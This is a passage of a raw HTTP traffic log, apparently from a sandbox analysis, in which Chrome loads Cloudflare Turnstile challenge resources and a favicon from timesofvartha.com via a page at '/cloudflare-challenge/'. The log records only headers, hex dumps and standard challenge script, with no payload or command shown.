                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/y1j5m/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:55:49 UTC240INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 18 Nov 2024 16:55:49 GMT
                                                                                                                              Content-Type: image/png
                                                                                                                              Content-Length: 61
                                                                                                                              Connection: close
                                                                                                                              cache-control: max-age=2629800, public
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e497d886f366b45-DFW
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              2024-11-18 16:55:49 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                              Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              15192.168.2.1749725208.91.198.814436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:55:50 UTC611OUTGET /favicon.ico HTTP/1.1
                                                                                                                              Host: timesofvartha.com
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                              Referer: https://timesofvartha.com/cloudflare-challenge/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:55:50 UTC261INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 18 Nov 2024 16:55:50 GMT
                                                                                                                              Server: Apache
                                                                                                                              Upgrade: h2,h2c
                                                                                                                              Connection: Upgrade, close
                                                                                                                              Last-Modified: Tue, 15 Mar 2022 22:06:31 GMT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Content-Length: 583
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Content-Type: text/html
                                                                                                                              2024-11-18 16:55:50 UTC583INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                                                                                                                              Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              16192.168.2.1749732104.18.94.414436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:55:50 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:55:50 UTC240INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 18 Nov 2024 16:55:50 GMT
                                                                                                                              Content-Type: image/png
                                                                                                                              Content-Length: 61
                                                                                                                              Connection: close
                                                                                                                              cache-control: max-age=2629800, public
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e497d8d98ea7d54-DFW
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              2024-11-18 16:55:50 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                              Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              17192.168.2.1749733104.18.94.414436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:55:51 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8e497d813cb62ff4&lang=auto HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:55:51 UTC331INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 18 Nov 2024 16:55:51 GMT
                                                                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                                                                              Content-Length: 131466
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e497d923f2b285f-DFW
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              2024-11-18 16:55:51 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 48 50 55 62 6a 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63
                                                                                                                              Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.HPUbj2={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fc
                                                                                                                              2024-11-18 16:55:51 UTC1369INData Raw: 61 67 65 25 33 43 25 32 46 61 25 33 45 25 32 30 69 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 6f 76 65 72 72 75 6e 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 74 75 63 6b 25 32 30 68 65 72 65 25 33 46 22 2c 22 69 6e 76 61 6c 69 64 5f 73 69 74 65 6b 65 79 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 73 69 74 65 6b 65 79 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 65 6e 64 25 32 30 46 65 65 64 62 61
                                                                                                                              Data Ascii: age%3C%2Fa%3E%20if%20the%20issue%20persists.","turnstile_overrun_description":"Stuck%20here%3F","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_feedback_description":"Send%20Feedba
                                                                                                                              2024-11-18 16:55:51 UTC1369INData Raw: 31 29 29 2f 36 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 39 33 39 29 29 2f 37 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 31 34 31 31 29 29 2f 38 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 31 32 38 34 29 29 2f 39 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 31 37 38 31 29 29 2f 31 30 29 2c 64 3d 3d 3d 66 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 31 31 32 39 34 35 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 4c 28 39 30 34 29 5d 2c 65 4f 3d 5b 5d 2c 65 50 3d 30 3b 32 35 36 3e 65 50 3b 65 4f 5b 65 50 5d 3d 53 74 72 69 6e 67 5b 67 4c 28 31 34 33 38 29 5d 28 65 50 29 2c 65 50 2b 2b 29 3b 65 51 3d
                                                                                                                              Data Ascii: 1))/6*(-parseInt(gK(939))/7)+-parseInt(gK(1411))/8+parseInt(gK(1284))/9*(-parseInt(gK(1781))/10),d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,112945),eM=this||self,eN=eM[gL(904)],eO=[],eP=0;256>eP;eO[eP]=String[gL(1438)](eP),eP++);eQ=
                                                                                                                              2024-11-18 16:55:51 UTC1369INData Raw: 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 76 6d 45 54 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 59 4d 66 4e 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 71 7a 4e 78 58 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 27 6f 62 77 53 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 45 74 49 50 44 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 49 59 65 62 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 4c 51 76 46 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d
                                                                                                                              Data Ascii: ,i){return h(i)},'vmETL':function(h,i){return h(i)},'YMfNh':function(h,i){return h&i},'qzNxX':function(h,i){return h*i},'obwSl':function(h,i){return h<i},'EtIPD':function(h,i){return h&i},'IYebk':function(h,i){return h(i)},'LQvFj':function(h,i){return h==
                                                                                                                              2024-11-18 16:55:51 UTC1369INData Raw: 31 34 29 5d 28 73 2c 46 29 3b 48 3d 48 3c 3c 31 2e 30 39 7c 31 2e 37 36 26 4d 2c 64 5b 68 79 28 32 30 33 31 29 5d 28 49 2c 64 5b 68 79 28 31 30 37 38 29 5d 28 6a 2c 31 29 29 3f 28 49 3d 30 2c 47 5b 68 79 28 35 37 31 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 43 3d 28 44 2d 2d 2c 44 3d 3d 30 26 26 28 44 3d 4d 61 74 68 5b 68 79 28 31 30 34 32 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 78 5b 4c 5d 3d 45 2b 2b 2c 64 5b 68 79 28 31 34 30 34 29 5d 28 53 74 72 69 6e 67 2c 4b 29 29 7d 69 66 28 43 21 3d 3d 27 27 29 7b 69 66 28 4f 62 6a 65 63 74 5b 68 79 28 39 31 32 29 5d 5b 68 79 28 39 32 30 29 5d 5b 68 79 28 32 30 36 34 29 5d 28 42 2c 43 29 29 7b 69 66 28 32 35 36 3e 43 5b 68 79 28 35 32 30 29 5d 28 30 29 29 7b 66 6f 72 28
                                                                                                                              Data Ascii: 14)](s,F);H=H<<1.09|1.76&M,d[hy(2031)](I,d[hy(1078)](j,1))?(I=0,G[hy(571)](o(H)),H=0):I++,M>>=1,s++);C=(D--,D==0&&(D=Math[hy(1042)](2,F),F++),x[L]=E++,d[hy(1404)](String,K))}if(C!==''){if(Object[hy(912)][hy(920)][hy(2064)](B,C)){if(256>C[hy(520)](0)){for(
                                                                                                                              2024-11-18 16:55:51 UTC1369INData Raw: 21 3d 3d 6a 5b 68 42 28 31 30 32 38 29 5d 29 7b 69 66 28 6c 5b 68 42 28 39 37 34 29 5d 28 69 2c 21 5b 5d 29 29 72 65 74 75 72 6e 3b 28 6a 3d 21 5b 5d 2c 6b 28 29 2c 6c 5b 68 42 28 31 33 38 38 29 5d 29 26 26 28 6e 3d 7b 7d 2c 6e 5b 68 42 28 31 36 31 39 29 5d 3d 68 42 28 31 39 39 32 29 2c 6e 5b 68 42 28 31 36 37 34 29 5d 3d 73 5b 68 42 28 31 39 34 34 29 5d 5b 68 42 28 37 33 39 29 5d 2c 6e 5b 68 42 28 31 33 35 31 29 5d 3d 68 42 28 31 38 34 31 29 2c 6f 5b 6c 5b 68 42 28 31 36 34 36 29 5d 5d 5b 68 42 28 31 38 37 32 29 5d 28 6e 2c 27 2a 27 29 29 7d 65 6c 73 65 20 72 65 74 75 72 6e 20 68 5b 68 42 28 35 32 30 29 5d 28 6b 29 7d 29 7d 2c 27 69 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 68 43 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a
                                                                                                                              Data Ascii: !==j[hB(1028)]){if(l[hB(974)](i,![]))return;(j=![],k(),l[hB(1388)])&&(n={},n[hB(1619)]=hB(1992),n[hB(1674)]=s[hB(1944)][hB(739)],n[hB(1351)]=hB(1841),o[l[hB(1646)]][hB(1872)](n,'*'))}else return h[hB(520)](k)})},'i':function(i,j,o,hC,s,x,B,C,D,E,F,G,H,I,J
                                                                                                                              2024-11-18 16:55:51 UTC1369INData Raw: 43 28 31 32 37 33 29 5d 28 27 27 29 7d 69 66 28 64 5b 68 43 28 31 34 38 33 29 5d 28 30 2c 78 29 26 26 28 78 3d 4d 61 74 68 5b 68 43 28 31 30 34 32 29 5d 28 32 2c 43 29 2c 43 2b 2b 29 2c 73 5b 4d 5d 29 4d 3d 73 5b 4d 5d 3b 65 6c 73 65 20 69 66 28 42 3d 3d 3d 4d 29 4d 3d 64 5b 68 43 28 35 33 32 29 5d 28 45 2c 45 5b 68 43 28 37 32 37 29 5d 28 30 29 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 44 5b 68 43 28 35 37 31 29 5d 28 4d 29 2c 73 5b 42 2b 2b 5d 3d 64 5b 68 43 28 35 33 32 29 5d 28 45 2c 4d 5b 68 43 28 37 32 37 29 5d 28 30 29 29 2c 78 2d 2d 2c 45 3d 4d 2c 30 3d 3d 78 26 26 28 78 3d 4d 61 74 68 5b 68 43 28 31 30 34 32 29 5d 28 32 2c 43 29 2c 43 2b 2b 29 7d 7d 7d 2c 67 3d 7b 7d 2c 67 5b 68 77 28 31 33 31 39 29 5d 3d 66 2e 68 2c 67 7d 28 29 2c
                                                                                                                              Data Ascii: C(1273)]('')}if(d[hC(1483)](0,x)&&(x=Math[hC(1042)](2,C),C++),s[M])M=s[M];else if(B===M)M=d[hC(532)](E,E[hC(727)](0));else return null;D[hC(571)](M),s[B++]=d[hC(532)](E,M[hC(727)](0)),x--,E=M,0==x&&(x=Math[hC(1042)](2,C),C++)}}},g={},g[hw(1319)]=f.h,g}(),
                                                                                                                              2024-11-18 16:55:51 UTC1369INData Raw: 29 29 3f 73 28 69 2b 44 2c 45 29 3a 46 7c 7c 73 28 6f 5b 68 47 28 32 30 35 33 29 5d 28 69 2c 44 29 2c 68 5b 44 5d 29 29 3a 73 28 69 2b 44 2c 45 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 21 21 5b 5d 3b 72 65 74 75 72 6e 20 6a 3b 66 75 6e 63 74 69 6f 6e 20 73 28 47 2c 48 2c 68 48 29 7b 68 48 3d 68 47 2c 4f 62 6a 65 63 74 5b 68 48 28 39 31 32 29 5d 5b 68 48 28 39 32 30 29 5d 5b 68 48 28 32 30 36 34 29 5d 28 6a 2c 48 29 7c 7c 28 6a 5b 48 5d 3d 5b 5d 29 2c 6a 5b 48 5d 5b 68 48 28 35 37 31 29 5d 28 47 29 7d 7d 2c 66 71 3d 67 4c 28 39 36 35 29 5b 67 4c 28 36 31 37 29 5d 28 27 3b 27 29 2c 66 72 3d 66 71 5b 67 4c 28 31 39 39 34 29 5d 5b 67 4c 28 39 30 37 29 5d 28 66 71 29 2c 65 4d 5b 67 4c 28 37 34 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 68 4a 2c 69 2c 6a
                                                                                                                              Data Ascii: ))?s(i+D,E):F||s(o[hG(2053)](i,D),h[D])):s(i+D,E);else return!![];return j;function s(G,H,hH){hH=hG,Object[hH(912)][hH(920)][hH(2064)](j,H)||(j[H]=[]),j[H][hH(571)](G)}},fq=gL(965)[gL(617)](';'),fr=fq[gL(1994)][gL(907)](fq),eM[gL(743)]=function(g,h,hJ,i,j
                                                                                                                              2024-11-18 16:55:51 UTC1369INData Raw: 67 4c 28 32 30 36 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 69 72 2c 64 2c 65 2c 66 2c 67 29 7b 69 72 3d 67 4c 2c 64 3d 7b 7d 2c 64 5b 69 72 28 32 30 31 31 29 5d 3d 69 72 28 31 35 30 31 29 2c 65 3d 64 2c 66 3d 31 2c 67 3d 31 65 33 2a 65 4d 5b 69 72 28 31 34 39 39 29 5d 5b 69 72 28 31 32 32 32 29 5d 28 32 3c 3c 66 2c 33 32 29 2c 65 4d 5b 69 72 28 38 39 31 29 5d 28 66 75 6e 63 74 69 6f 6e 28 69 73 29 7b 69 73 3d 69 72 2c 65 4d 5b 69 73 28 31 33 38 38 29 5d 26 26 28 65 4d 5b 69 73 28 37 30 32 29 5d 5b 69 73 28 31 37 31 30 29 5d 28 29 2c 65 4d 5b 69 73 28 37 30 32 29 5d 5b 69 73 28 31 31 32 37 29 5d 28 29 2c 65 4d 5b 69 73 28 35 31 37 29 5d 3d 21 21 5b 5d 2c 65 4d 5b 69 73 28 31 33 38 38 29 5d 5b 69 73 28 31 38 37 32 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 69 73
                                                                                                                              Data Ascii: gL(2069)]=function(ir,d,e,f,g){ir=gL,d={},d[ir(2011)]=ir(1501),e=d,f=1,g=1e3*eM[ir(1499)][ir(1222)](2<<f,32),eM[ir(891)](function(is){is=ir,eM[is(1388)]&&(eM[is(702)][is(1710)](),eM[is(702)][is(1127)](),eM[is(517)]=!![],eM[is(1388)][is(1872)]({'source':is
                                                                                                                              2024-11-18 16:55:51 UTC1369INData Raw: 69 74 28 31 38 38 36 29 5d 29 2b 65 4d 5b 69 74 28 31 39 34 34 29 5d 5b 69 74 28 31 35 38 32 29 5d 2b 27 2f 27 2c 65 4d 5b 69 74 28 31 39 34 34 29 5d 2e 63 48 29 2c 27 2f 27 29 2c 65 4d 5b 69 74 28 31 39 34 34 29 5d 5b 69 74 28 31 36 39 34 29 5d 29 2c 73 3d 7b 7d 2c 73 5b 69 74 28 31 35 36 30 29 5d 3d 65 4d 5b 69 74 28 31 39 34 34 29 5d 5b 69 74 28 31 35 36 30 29 5d 2c 73 5b 69 74 28 35 31 35 29 5d 3d 65 4d 5b 69 74 28 31 39 34 34 29 5d 5b 69 74 28 35 31 35 29 5d 2c 73 5b 69 74 28 32 30 36 36 29 5d 3d 65 4d 5b 69 74 28 31 39 34 34 29 5d 5b 69 74 28 32 30 36 36 29 5d 2c 73 5b 69 74 28 35 34 33 29 5d 3d 65 4d 5b 69 74 28 31 39 34 34 29 5d 5b 69 74 28 31 34 33 33 29 5d 2c 78 3d 73 2c 42 3d 6e 65 77 20 65 4d 5b 28 69 74 28 39 35 37 29 29 5d 28 29 2c 21 42 29
                                                                                                                              Data Ascii: it(1886)])+eM[it(1944)][it(1582)]+'/',eM[it(1944)].cH),'/'),eM[it(1944)][it(1694)]),s={},s[it(1560)]=eM[it(1944)][it(1560)],s[it(515)]=eM[it(1944)][it(515)],s[it(2066)]=eM[it(1944)][it(2066)],s[it(543)]=eM[it(1944)][it(1433)],x=s,B=new eM[(it(957))](),!B)


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              18192.168.2.1749734104.18.94.414436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:55:51 UTC1150OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1934195006:1731948353:unz671KSRq1ToGyOHQQkK3w4rNHjodEQ7ar4OrQ9NOM/8e497d813cb62ff4/MDvrsZI1VGmqlLbJRpJUmll3UtGGVQo4c3IEyGk_pTQ-1731948948-1.1.1.1-tjPxUzHkLuXL14nwMEaUPUlXPG6NhyXQNVxCbHUc0PNpbzwGotvMckMqufOiL4HB HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              Content-Length: 3197
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              Content-type: application/x-www-form-urlencoded
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              CF-Challenge: MDvrsZI1VGmqlLbJRpJUmll3UtGGVQo4c3IEyGk_pTQ-1731948948-1.1.1.1-tjPxUzHkLuXL14nwMEaUPUlXPG6NhyXQNVxCbHUc0PNpbzwGotvMckMqufOiL4HB
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: */*
                                                                                                                              Origin: https://challenges.cloudflare.com
                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/y1j5m/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:55:51 UTC3197OUTData Raw: 76 5f 38 65 34 39 37 64 38 31 33 63 62 36 32 66 66 34 3d 42 61 6b 53 2d 53 58 53 4c 53 74 53 25 32 62 53 78 37 5a 31 37 5a 2d 43 66 2d 66 45 51 57 66 51 5a 66 43 36 45 77 61 67 5a 62 36 5a 56 43 56 77 6d 6b 66 63 56 36 4d 4a 58 5a 77 4b 73 53 5a 2d 4e 33 54 5a 6d 59 67 66 4f 5a 74 43 51 45 47 4a 50 5a 51 54 5a 38 67 66 62 58 56 5a 43 67 5a 57 5a 54 4b 6f 2d 5a 6f 43 4c 4a 5a 38 43 6b 62 6f 63 71 79 71 46 5a 4d 74 5a 66 6f 59 4b 66 73 67 6b 36 5a 32 48 53 5a 45 71 66 4f 6b 67 74 5a 48 69 61 5a 32 5a 63 66 56 4c 5a 63 5a 4d 61 75 5a 63 73 6f 33 54 53 5a 63 53 4c 58 5a 35 2d 5a 6b 2b 36 46 5a 69 6b 2d 54 67 4c 4b 42 53 51 4c 43 53 4c 24 5a 36 73 65 36 5a 58 58 5a 32 6b 5a 53 72 4e 55 5a 74 55 42 5a 42 78 36 63 50 5a 5a 75 53 50 2d 62 68 78 38 5a 4c 78 78 79
                                                                                                                              Data Ascii: v_8e497d813cb62ff4=BakS-SXSLStS%2bSx7Z17Z-Cf-fEQWfQZfC6EwagZb6ZVCVwmkfcV6MJXZwKsSZ-N3TZmYgfOZtCQEGJPZQTZ8gfbXVZCgZWZTKo-ZoCLJZ8CkbocqyqFZMtZfoYKfsgk6Z2HSZEqfOkgtZHiaZ2ZcfVLZcZMauZcso3TSZcSLXZ5-Zk+6FZik-TgLKBSQLCSL$Z6se6ZXXZ2kZSrNUZtUBZBx6cPZZuSP-bhx8ZLxxy
                                                                                                                              2024-11-18 16:55:51 UTC747INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 18 Nov 2024 16:55:51 GMT
                                                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                                                              Content-Length: 149820
                                                                                                                              Connection: close
                                                                                                                              cf-chl-gen: KMN5Tx6Z/4SEhOSXm/vgxw4y2CxL0qkv4ox3WbKNM79bBQFT9dThQlbXGIcOf64LHxA/rR3fDDJEz2uzbDjVs7+iOnN1AKKUMJe3SKi5x3VFbLQrWodnLW+HhAqQBdWWnRB/E06Sj13l1j2aKb8h4Upxn0tPui0X18gmRwwurSy6cenonV0uZoHbFoSM6G9rxFTdkAw8gGLBd000ietrZEgk4TFrkbKRNcUPgJHuARSYFgJ/T71VO5SDk4emk5Fn2nBWtRwltowlTd1UU8/3ys5r/qf2sCqT01z0fOED9Fzqri2BbrWTJCCUiSc5x1Ko+X3gUsDGLD7xi0TxzX1qLOGWiXoWLn672fqsJM+s0TJz8eqDBEW4GJIbHaAo5PCOiaMSZyMckuD9W8tcR43XNGV/F5XWLGhCxgXz89I1E0O+0fHMRGoK16AnuQl4BswhTh2JheCWZm41jp1JEVkJLW9zvVhr98gOH/h4esphHG+TisU=$KabJFWYmXCSwyqza
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e497d932a826ba3-DFW
                                                                                                                              alt-svc: h3=":443"; ma=86400
